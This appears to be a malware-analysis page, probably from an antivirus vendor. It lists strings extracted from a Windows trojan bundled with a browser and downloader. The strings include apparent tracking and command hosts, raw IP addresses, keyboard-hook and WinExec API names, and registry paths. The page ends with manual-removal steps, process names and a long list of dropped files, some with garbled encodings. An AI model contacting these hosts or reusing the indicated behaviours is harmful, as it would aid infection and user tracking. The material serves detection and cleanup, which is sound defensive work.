    ou.mnyb.net
    222.88.93.108
    125.43.78.118
    xh.dat
    -1001_1_srr.exe
    MAPI32.DLL
    supports
    importNode
    %s="%s"
    %s%s%s: %d%s%s
    gdiplus.dll
    GdiplusShutdown
    user32.dll
    OnActionExecute
    rcmDefault
    rcmDebug
    DontExecuteScripts
    DontExecuteJava
    DontExecuteActiveX
    DisableUrlIfEncodingUTF8
    EnableUrlIfEncodingUTF8
    CheckFontSupportsCodePage
    DisableSubmitUrlInUTF8
    EnableSubmitUrlInUTF8
    lpMsg
    PMsg
    pguidCmdGroup
    TTranslateUrlEvent
    pchURLIn
    ppchURLOut
    CmdID
    pszUrl
    pszUrlContext
    szPassWord
    ErrorUrl
    OptionKeyPath
    OverrideOptionKeyPath,mL
    OnTranslateUrlXtL
    OnCommandExecl
    '%s' is not supported.
    WebocPopupManagement
    ValidateNavigateUrl
    HttpUsernamePasswordDisable
    GetUrlDomFilePathUnencoded
    XmlHttp
    https://
    AppEvents\Schemes\Apps\Explorer\Navigating\.Current
    .Current
    \ieframe.dll
    \shdocvw.dll
    \StringFileInfo\%0.4x%0.4x\%s
    TMsgEvent
    TKeyEventEx
    Port
    Password
    poPortrait
    0.750000
    3333333
    \Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
    \Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
    User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
    EmbeddedWB http://bsalsa.com/
    TOnPaintWebICOEvent
    ScrollLeftPic
    OnPaintWebICOT
    LinkUrlT
    Fav%d.dat
    Setup.ini
    TFormLoginTips
    LoginUrl
    /WebShell
    CMD:Login
    CMD:Reg
    CMD:Logout:
    CMD:Close
    UnsupportedGdiplusVersion
    PropertyNotSupported
    aclBurlyWood
    rpcrt4.dll
    KERNEL32.DLL
    GetDeskTopIcoPositionX64.exe
    mvyy.exe
    dtk.vsnis.com
    lbldi.dat
    Heatbeat.ini
    {6BF52A52-394A-11D3-B153-00C04F79FAA6}
    {22D6F312-B0F6-11D0-94AB-0080C74C7E95}
    {CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA}
    {05589FA1-C356-11CE-BF01-00AA0055595A}
    {CD3AFA76-B84F-48F0-9393-7EDC34128127}
    {CD3AFA74-B84F-48F0-9393-7EDC34128127}
    {CD3AFA89-B84F-48F0-9393-7EDC34128127}
    {CD3AFA84-B84F-48F0-9393-7EDC34128127}
    {CD3AFA8F-B84F-48F0-9393-7EDC34128127}
    {CD3AFA94-B84F-48F0-9393-7EDC34128127}
    {889D2FEB-5411-4565-8998-1DD2C5261283}
    {A9322148-C691-4B9D-91FC-B9C461DBE9DD}
    {95B3F550-91C4-4627-BCC4-521288C52977}
    {162AF25B-5A2A-448E-A842-194653EF3E05}
    {E05BC2A3-9A46-4A32-80C9-023A473F5B23}
    {EF0D1A14-1033-41A2-A589-240C01EDC078}
    {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}
    {5D09DD40-CDC4-4C56-B615-0D1E3B357C2B}
    {18DF081C-E8AD-4283-A596-FA578C2EBDC3}
    TXMLKeyWorksType
    TXMLKeyWorkType
    KeyWordID
    ViewPassWord
    KeyWorks
    KeyIndex
    CancelWebRange
    CancelWebRule
    UseSysWeb
    Uh.zO
    NewWebBrowser
    MsgClick
    WebWidth
    WebHeight
    MsgType
    \Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\
    \System32\config\systemprofile\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\
    WebUtils
    .com.net.org.gov.edu.mil.biz.name.info.mobi.pro.travel.museum.int.aero.post.rec.asia.ac.ad.ae.af.ag.ai.al.am.an.ao.aq.ar.as.at.au.aw.az.ba.bb.bd.be.bf.bg.bh.bi.bj.bm.bn.bo.br.bs.bt.bv.bw.by.bz.ca.cc.cf.cd.ch.ci.ck.cl.cm.cn.co.cq.cr.cu.cv.cx.cy.cz.de.dj.dk.dm.do.dz.ec.ee.eg.eh.er.es.et.ev.fi.fj.fk.fm.fo.fr.ga.gd.ge.gf.gg.gh.gi.gl.gm.gn.gp.gr.gs.gt.gu.gw.gy.hk.hm.hn.hr.ht.hu.id.ie.il.im.in.io.iq.ir.is.it.jm.jo.jp.je.ke.kg.kh.ki.km.kn.kp.kr.kw.ky.kz.la.lb.lc.li.lk.lr.ls.lt.lu.lv.ly.ma.mc.md.me.mg.mh.mk.ml.mm.mn.mo.mp.mq.mr.ms.mt.mu.mv.mw.mx.my.mz.na.nc.ne.nf.ng.ni.nl.no.np.nr.nt.nu.nz.om.qa.pa.pe.pf.pg.ph.pk.pl.pm.pn.pr.pt.pw.py.re.rs.ro.ru.rw.sa.sb.sc.sd.se.sg.sh.si.sj.sk.sl.sm.sn.so.sr.st.sv.su.sy.sz.tc.td.tf.tg.th.tj.tk.tl.tm.tn.to.tr.tt.tv.tw.tz.ua.ug.uk.um.us.uy.uz.va.vc.ve.vg.vi.vn.vu.wf.ws.ye.yt.za.zm.zw.arts.com.edu.firm.gov.info.net.nom.org.rec.store.web.
    TMyWeb
    FrameWeb
    IfmWeb
    TFmWeb
    TMulWebBrower
    .exe.zip.rar.7z.mp3.avi.asf.iso.mpeg.mpg.mpga.ra.rm.rmvb.tar.wma.wmp.wmv.pdf.doc.xls.xlsx.docx.dat.apk.ipa.mp4.xap.
    TFmWebShuter
    ApplicationEvents1ActionExecute
    {A3CD2C5E-4A7E-478E-9A43-B8A193847281}
    EIdCanNotBindPortInRange
    EIdInvalidPortRange
    D:\Program Files\CodeGear\RAD Studio\5.0\source\Indy\Indy10\System\IdStreamVCL.pas
    D:\Program Files\CodeGear\RAD Studio\5.0\source\Indy\Indy10\System\IdGlobal.pas
    getservbyport
    WSAAsyncGetServByPort
    WSAJoinLeaf
    WS2_32.DLL
    Wship6.dll
    EIdIPVersionUnsupportedU
    TIdSocketListWindows
    TIdStackWindowsU
    IdStackWindows
    127.0.0.1
    D:\Program Files\CodeGear\RAD Studio\5.0\source\Indy\Indy10\System\IdStack.pas
    ftpTransfer
    ftpReady
    ftpAborted
    ClientPortMinT
    ClientPortMax
    PortSVW
    EIdPortRequiredt2Q
    EIdTCPConnectionError
    EIdObjectTypeNotSupported
    PortT
    D:\Program Files\CodeGear\RAD Studio\5.0\source\Indy\Indy10\Core\IdIOHandler.pas
    "EIdTransparentProxyUDPNotSupported
    %EIdSocksUDPNotSupportedBySOCKSVersion
    saUsernamePassword
    PasswordT
    Port
    0.0.0.1
    0.0.0.0
    BoundPortT
    DefaultPort
    TIdTCPConnection
    TIdTCPConnection,
    IdTCPConnection
    TIdTCPClientCustom
    IdTCPClient
    TIdTCPClient
    TIdTCPClienth
    :OffSet %d ; Len %d ; Size %d
    TUDPReadEvent
    TUDPErrorEvent
    EUDPError
    TUDPListenerThread
    TUDP
    TUDPT
    UDPClass
    AutoIncPort
    DefaultPort
    OnUDPRead
    OnUDPErrorU
    WSACreateEvent error,Code:%d
    WSAEventSelect error,code:%d
    OnUDPRead "%s" Excpetion: %s
    TCmdStream
    TStaticMemoryManager.Create: Unable to alloc memory
    TStaticMemoryManager.Create: Initialize FreeQueue error
    TUDPClientReadEvent
    TUDPClientFTPDataEvent
    APeerPort
    TUDPWorkThread
    UDPClientClass
    TUDPClient
    DefaultPortT
    OnUDPClientError
    OnUDPClientRead
    OnUDPClientFTPData
    TUDPClient.CloseUDPClient
    "%s" raised exception class [%s] with message "%s"
    DoUDPClientRead
    UDPRead: InsertNode faild!
    TUDPWorkThread.Execute
    {56048A91-0F0B-4726-B8E1-F55BF6DD939A}
    {56048A91-0F0B-4726-B8E1-F55BF6DD939A}FILE NOT FOUND
    '%D.%D' IS NOT A VALID TIMESTAMP
    '%S' IS NOT A VALID GUID VALUE
    '%S' IS NOT A VALID BOOLEAN VALUE
    INVALID POINTER OPERATION
    '%S' IS NOT A VALID INTEGER VALUE
    '%S' IS NOT A VALID FLOATING POINT VALUE
    '%S' IS NOT A VALID CURRENCY VALUE
    INVALID FLOATING POINT OPERATION
    QUIT KEY HIT
    OPERATION ABORTED
    EXCEPTION %S IN MODULE %S AT %P.
    ACCESS VIOLATION AT ADDRESS %P. %S OF ADDRESS %P
    '%S' IS NOT A VALID DATE
    '%S' IS NOT A VALID TIME
    '%S' IS NOT A VALID DATE AND TIME
    INVALID VARIANT OPERATION (%S%.8X)
    I/O ERROR %D
    CUSTOM VARIANT TYPE (%S%.4X) ALREADY USED BY %S
    1.0.4
    00-00-00-00-00-00
    NETAPI32.DLL
    NetWkstaTransportEnum
    TCPIP
    \\.\PhysicalDrive0
    \\.\SMARTVSD
    conAT.dat
    tongji.nbhscl.com
    tongji.N152.com
    123.157.215.216
    acdat.dat
    Software\Microsoft\Windows\CurrentVersion\App Paths\Mnyig
    Software\Microsoft\Windows\CurrentVersion\Uninstall\
    usst.exe
    URLInfoAbout
    %ProgramFiles%\Internet Explorer\iexplore.exe
    edi.dat
    http://udd.mny8.com.cn:4518/tj?qid=
    http://udd.mnyb.net:4518/tj?qid=
    http://125.43.78.117:4518/tj?qid=
    http://222.88.93.101:4518/tj?qid=
    runa.ini
    FormKeyPress
    lblUrl
    http://web.mny8.com/Handler/Handler.ashx?action=like&id=
    http://web.mny8.com/fav.aspx?id=
    favicon.ico
    TMonochromeLookup
    uWebBrowser
    lblURL
    lblURLClick
    lblURLMouseEnter
    lblURLMouseLeave
    http://soft.mny8.com
    TFormWebShow
    frmWebShow
    ShowWebForm:
    TFormWebShow WebNavParms.URL:
    TFormWebShow.wb1 not HandleAllocated
    Act_Loginx
    Act_MaxExecute
    Act_MinExecute
    Act_HomePageExecute
    Act_ShowTrayExecute
    Act_CloseExecute
    Act_AboutExecute
    Act_CloseOrTrayExecute
    Act_CheckUpdateExecute
    Act_AutoRunExecute
    Act_ShowUserPnlExecute
    Act_LoginExecute
    Act_RegExecute
    Act_RechargeExecute
    Act_RefExecute
    edtSearchKeyPress
    http://www.mny8.com
    http://web.mny8.com/Recharge.aspx
    http://www.baidu.com
    http://web.mny8.com/index.html?action=search&keyword=
    /WebShell
    /WebShell2
    btns.js
    http://web.mny8.com/json/btns1/btns.js
    http://web.mny8.com/renwu.html?uid=
    WMOpenWebUrl
    http://web.mny8.com/json/task/task.js
    TFormWebShowOnly
    TFormWebShowOnly4yT
    frmWebShowOnly
    pTipsType:%d
    ShellExecute
    Debug.txt
    username=%s&taskid=%s&action=taskok
    )4."1-2(
    *5/#2.3)
    ",71@5  &
    3'627-"(
    1 '-7#&0
    1&,#84 .'*
    - 8!3(.%
    7&-3!),6%
    #5*0' 8$2 .
    8'.4"*-7& 0#
    ("2%!&8-3*#
    /5,%!)703
    (03!,&6)%* 17.'# 
    $/6 *25#.(8 ',"3
    &18",47%0*
    '2, / 0&7!4-)1#8
    (3-!0,1'8"5.*2$
    inflate 1.0.4 Copyright 1995-1996 Mark Adler
    MnyigU.exe
    advapi32.dll
    RegOpenKeyExA
    RegCloseKey
    GetKeyboardType
    UnhookWindowsHookEx
    SetWindowsHookExA
    MsgWaitForMultipleObjects
    MapVirtualKeyA
    LoadKeyboardLayoutA
    GetKeyboardState
    GetKeyboardLayoutNameA
    GetKeyboardLayoutList
    GetKeyboardLayout
    GetKeyState
    GetKeyNameTextA
    EnumWindows
    EnumThreadWindows
    EnumChildWindows
    ActivateKeyboardLayout
    gdi32.dll
    SetViewportOrgEx
    version.dll
    WinExec
    GetCPInfo
    CreatePipe
    RegQueryInfoKeyA
    RegFlushKey
    RegEnumKeyExA
    RegDeleteKeyA
    RegCreateKeyExA
    wininet.dll
    InternetOpenUrlA
    HttpSendRequestA
    HttpQueryInfoA
    HttpOpenRequestA
    HttpAddRequestHeadersA
    FindNextUrlCacheEntryA
    FindFirstUrlCacheEntryA
    FindCloseUrlCache
    DeleteUrlCacheEntry
    ShellExecuteExA
    ShellExecuteW
    ShellExecuteA
    comdlg32.dll
    wsock32.dll
    ws2_32.dll
    iphlpapi.dll
    msvcrt.dll
    GdipGetStringFormatHotkeyPrefix
    GdipSetStringFormatHotkeyPrefix
    GdipSetImageAttributesColorKeys
    winmm.dll
    dsound.dll
    2 2$2(2,2
    = =$=(=,=0=4=8=<=@=
    < <$<(<,<0<4<
    2,2x2
    9 9$9(9,9094989
    3#373?3]3
    00141<1@1
    8 8$8(8,8084888<8
    8-85898Q8Y8u8}8
    3,4044484
    ; ;$;(;,;0;4;8;<;
    >!>%>->1>8>
    ;";&;*;.;4;};
    243D3g3
    99X9
    5#6'6 606
    82969<9~9
    9/:3:7:<:
    <(=.=3=8===
    :":&:*:.:
    9&9-949;9
    8 8$8(8,8084888
    4 4$4(4,4044484<4
    89M9
    < =&=9=}=~>
    ; ;$;(;,;0;4;8;
    >'?,?;?@?
    ;$;*;3;:;
    3 3$3(3,3034383<3\3|3
    9 9$9(9,9094989<9\9|9
    4"4&4*4.42464:4
    :":(:2:7:3;
    ;#;'; ;/;3;7;
    8&909:9?9
    stdole2.tlbWWW
    :WebShell
    mUrlsWWW
    ShowWebFormW
    TaUrl
    urlW
    licourlWW
    -ShowUrlW
    OpenUrlW
    KeyW
    333333333333333333
    33333833
    3333339
    3333333333333338
    :*"*"$3338
    33333333
    33333333333
    3333333333338
    33338?383
    333333333333
    :*3:"$3338
    333333333333333
    .KBx=
    .QaQU@q
    K1j=%d
    %fq'A
    hf%ub
    8%FqS
    .JmgL
    n.UZt
    eK0%D
    jt%xR
    b%xhE
    KWindows
    %ClientCmdUnit
    &UDPClientClass
    9CmdConstUnit
    CmdStreamClass
    uWebPosModel
    USimpleTcp
    7USimpleUdpClient
    ?HTTPApp
    >WebConst
    lfrmLoginTips
    uMsgFilter
    frmUserLogin
    UPipeTransConst
    UPipeTransClient
    TfmWeb
    fmWeb
    Font.Charset
    Font.Color
    Font.Height
    Font.Name
    Font.Style
    PNGImage.Data
    iTXtXML:com.adobe.xmp
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    OnKeyPress
    Picture.Data
    6z%ug
    %uI"Q?
    FormLoginTips
    diTXtXML:com.adobe.xmp
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        nWqU
    Z.xeX`
    %uB9oj
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        $
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    DialogBoxes.DisableAll
    PrintOptions.Margins.Left
    PrintOptions.Margins.Right
    PrintOptions.Margins.Top
    PrintOptions.Margins.Bottom
    PrintOptions.HTMLHeader.Strings
    PrintOptions.Orientation
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    %.fE 
    Constraints.MinHeight
    Constraints.MinWidth
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        &V
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        T
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    TFormUserLogin
    FormUserLogin
    30]%S
    EÞ,
    Z.czN
    Ce%x'x
    .xCn>
    .cx!Y
    T.yj1
    xZ<.ad
    imgLoginBottom
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    ?
    btnLogin
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    btnLoginClick
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    lblQQLogin
    lblQQLoginClick
    lblQQLoginMouseEnter
    lblQQLoginMouseLeave
    edtRePass
    edtPassKeyPress
    edtUserKeyPress
    edtPass
    FormWebShow
    DisableErrors.fpExceptions
    HTMLCode.Strings
    BtnImage.Data
    BgPic.Data
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    FormWebShowOnly
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    PicBtnLeft.Data
    PicBtnRight.Data
    TabPic.Data
    ScrollLeftPic.Data
    ScrollRightPic.Data
    CloseBtnPic.Data
    MenuBtnPic.Data
    NewBtnPic.Data
    Act_Login
    version="11.0.2902.10471"
    name="Microsoft.Windows.Common-Controls"
    version="6.0.0.0"
    publicKeyToken="6595b64144ccf1df"
    http://www.w3.org/2001/XMLSchema
    http://www.w3.org/2000/xmlns/
    http://www.w3.org/2001/XMLSchema-instance
    errorUrl
    {surl}
    KeyWork
    loginurl
    keyword
    {"key":"
    TFMWEB
    TFORMLOGINTIPS
    TFORMUSERLOGIN
    TFORMWEBSHOW
    TFORMWEBSHOWONLY
    AInternal error: Extension Instance does not match Extension Label,Unsupported Application Extension block size
    Unknown GIF block type'Object type not supported for operation
    Unsupported PixelFormat
    Invalid stream operation
    Invalid extension introducerúiled to allocate memory for GIF DIB
    File "%s" not found
    Object type not supported.
    Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
    Reply Code is not valid: %s
    Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
    Command not supported.
    Address type not supported."%d: Circular links are not allowed
    Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
    Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
    Invalid Port Range (%d - %d)
    %s is not a valid service.
    %s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
    Set Size Exceeded.)UDP is not support in this SOCKS version.
    Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
    Operation now in progress.
    Operation already in progress.
    Socket operation on non-socket.
    Protocol not supported.
    Socket type not supported."Operation not supported on socket.
    Protocol family not supported.0Address family not supported by protocol family.
    &Error on loading Winsock2 library (%s)
    Resolving hostname %s.
    Connecting to %s.
    Socket Error # %d
    Operation would block.
    Node "%s" not found
    IDOMNode required.Attributes are not supported on this node type
    Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions#ItemTag property is not initialized
    Node is readonlyCRefresh is only supported if the FileName or XML properties are set
    Line*Error on call Winsock2 library function %s1Invalid URL encoded character (%s) at position %d
    Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d
    JPEG error #%d
    JPEG Image File)"%s" DOMImplementation already registered
    No matching DOM Vendor: "%s"
    UTF-7Ênnot remove shell notification iconÊnnot create shell notification icon"PageControl must first be assigned"%s requires Windows Vista or later
    OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
    OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Error decoding URL style (%%XX) encoded string at position %d
    Invalid clipboard format Clipboard does not support Icons
    Cannot open clipboard/Menu '%s' is already being used by another form
    - Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
    Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
    %s property out of range
    Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
    Unsupported clipboard format
    Failed to set data for '%s'
    Resource %s not found
    %s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
    Property %s does not exist
    Thread creation error: %s
    Thread Error: %s (%d)*Windows socket error: %s (%d), on API '%s'"Unable to find a Table of Contents
    No help found for %s#No context-sensitive help installed
    Unable to write to %s
    Invalid stream format$''%s'' is not a valid component name
    Invalid data type for '%s' List capacity out of bounds (%d)
    List count out of bounds (%d)
    List index out of bounds (%d) Out of memory while expanding memory stream
    Error reading %s%s%s: %s
    Failed to create key %s
    Failed to get data for '%s'
    Ancestor for '%s' not found
    Cannot assign a %s to a %s
    Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
    Class %s not found
    A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
    Cannot create file "%s". %s
    Cannot open file "%s". %s
    Operation not supported
    External exception %x
    Interface not supported
    %s (%s, line %d)
    Abstract Error?Access violation at address %p in module '%s'. %s of address %p
    System Error. Code: %d.
    Application Error1Format '%s' invalid or incompatible with argument
    No argument for format '%s'"Variant method calls not supported
    Invalid variant operation
    Invalid NULL variant operation%Invalid variant operation (%s%.8x)
    %s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
    Integer overflow Invalid floating point operation
    Invalid pointer operation
    Invalid class typecast0Access violation at address %p. %s of address %p
    Privileged instruction(Exception %s in module %s at %p.
    !'%s' is not a valid integer value('%s' is not a valid floating point value
    '%s' is not a valid date
    '%s' is not a valid time!'%s' is not a valid date and time
    '%s' is not a valid GUID value
    I/O error %d
    1.0.1011.1935
    1.0.0.0
    

    


    
Remove it with Ad-Aware
    

    

      

    1. Click (here) to download and install Ad-Aware Free Antivirus.
      2. 

    2. Update the definition files.
      3. 

    3. Run a full scan of your computer.
      4. 

    


    
Manual removal*
    

    

      

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):
      

      bddownloader.exe:3092
      shandian.exe:1480
      dudu_b_55045.exe:668
      BDDownloader.exe:3960
      BDDownloader.exe:3520
      regsvr32.exe:1936
      BDKVWsc.exe:2740
      RegSvr32.exe:468
      RegSvr32.exe:3168
      

      2. 

    2. Delete the original Trojan file.
      3. 

    3. Delete or disinfect the following files created/modified by the Trojan:
      

      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
      %Program Files%\shandian\bin\twcache.ini (1392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\123_sogou_com[1].txt (15456 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\newioage[1].css (715 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\welcome_cn[1].htm (1469 bytes)
      %Program Files%\shandian\bin\shandian.ini.tmp (244 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
      %Program Files%\shandian\bin\theworld.ac (196 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\NSISdl.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsvBE.tmp (21176 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\Base64.dll (4 bytes)
      %Documents and Settings%\%current user%\Templates\2920146065436\YYM_955WD30.gif (911 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\System.dll (11 bytes)
      %Program Files%\shandian\ico\360.ico (32 bytes)
      %Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\stat[1].htm (2 bytes)
      %Program Files%\shandian\bin\shandian.exe (28283 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\System.dll (11 bytes)
      %Program Files%\shandian\ico\ie.ico (700 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ionrkf_70688[1].rar (9606 bytes)
      %Documents and Settings%\%current user%\Desktop\ÉÁµçä¯ÀÀÆ÷.lnk (505 bytes)
      %Program Files%\shandian\config.ini (194 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\pczh_98_2[2].rar (1717 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\dudu_b_55045.exe (31790 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\F30241_s_0523[1].rar (91814 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\bind.dll (1989 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÉÁµçä¯ÀÀÆ÷.lnk (700 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\xID.dll (10 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\F30241_s_0523.exe (91814 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\config0.ini (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\-8853_1_mvy.exe (3363 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\config.ini (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\pczh_98_2.exe (1717 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\-8853_1_mvy[2].rar (12289 bytes)
      %Program Files%\shandian\ico\anquan.ico (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
      %Program Files%\shandian\ico\taobao.ico (15 bytes)
      %Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\ÉÁµçä¯ÀÀÆ÷.lnk (694 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dudu_b_55045[2].rar (31790 bytes)
      %Program Files%\shandian\bin\sdad.exe (12955 bytes)
      %Program Files%\shandian\shandian.exe (3124 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\ionrkf_70688.exe (9606 bytes)
      %Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\жÔØÉÁµçä¯ÀÀÆ÷.lnk (507 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Desktop\360°²È«ä¯ÀÀÆ÷.lnk (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nslB3.tmp\Md5dll.dll (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\cpc_img[1].htm (442 bytes)
      %Documents and Settings%\%current user%\Cookies\YWNRAD2W.txt (87 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\cpv1[1].htm (1117 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\tj[1].js (279 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\miniindex[1].htm (3687 bytes)
      %Program Files%\shandian\bin\update\PopWinParam.xml (196 bytes)
      %Documents and Settings%\%current user%\Cookies\FQ5A68D9.txt (86 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\stylemini[1].css (4968 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\jquery-1.7.2.min[1].js (47317 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\TailorHeadImageLayer.ini (1 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\Login_Layer.ini (1 bytes)
      C:\DuDu\Appsoftconfig\image\soft.xml (196 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\WebPage.ini (594 bytes)
      C:\DuDu\Appsoftconfig\image\ielogo.png (196 bytes)
      C:\DuDu\MSGBoxSkin\UI\no_button.png (1 bytes)
      C:\DuDu\Kpclick.ini (48 bytes)
      C:\DuDu\Appsoftconfig\image\play.png (196 bytes)
      C:\DuDu\MSGBoxSkin\UI\success.png (2 bytes)
      C:\DuDu\getnew.exe (1960 bytes)
      C:\DuDu\BootStart.dll (549 bytes)
      C:\DuDu\KPMsgBoxDll.dll (3086 bytes)
      C:\DuDu\MSGBoxSkin\UI\question.png (2 bytes)
      C:\DuDu\KPConfig.inf (3 bytes)
      C:\DuDu\Appsoftconfig\image\cmd.png (196 bytes)
      C:\DuDu\loginInfo\login.ini (216 bytes)
      C:\DuDu\MSGBoxSkin\UI\ok_button.png (1 bytes)
      C:\DuDu\MSGBoxSkin\UI\faild.png (2 bytes)
      C:\DuDu\ExpandPackCheck.exe (1725 bytes)
      C:\DuDu\MSGBoxSkin\UI\error.png (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\ĬÈÏ\ui\msgbox\close.png (3 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\AboutDlgConfig\MainDlg.ini (1 bytes)
      C:\DuDu\Appsoftconfig\image\coculation.png (196 bytes)
      C:\DuDu\livability.dll (1921 bytes)
      C:\DuDu\Kp_BootClr.exe (1529 bytes)
      C:\DuDu\IndividualCenter.dll (7209 bytes)
      C:\DuDu\Appsoftconfig\image\buttonplay.png (196 bytes)
      C:\DuDu\MSGBoxSkin\UI\stop_button.png (1 bytes)
      C:\DuDu\Dudu_Mini.exe (157 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\AllApplication_Layer.ini (1 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\AppDlgConfig\MainDlgSkin.ini (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\6290556124\LZMA.dll (68 bytes)
      C:\DuDu\dgmon.dll (863 bytes)
      C:\DuDu\Appsoftconfig\image\buttoncmd.png (196 bytes)
      C:\DuDu\skinConfig\ĬÈÏ\CenterDlgConfig\MainSkin.ini (1 bytes)
